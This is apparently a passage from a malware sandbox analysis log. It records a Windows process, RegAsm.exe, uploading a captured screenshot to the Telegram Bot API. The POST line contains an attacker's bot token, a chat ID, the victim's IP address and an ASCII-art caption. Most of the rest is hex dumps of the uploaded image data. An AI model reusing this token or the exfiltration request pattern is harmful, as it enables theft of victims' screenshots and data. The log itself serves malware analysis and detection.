                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:50 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:50 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.449779149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:52 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd32fcdc51679a
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 63 64 63 35 31 36 37 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd32fcdc51679aContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:52 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:53 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:53 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
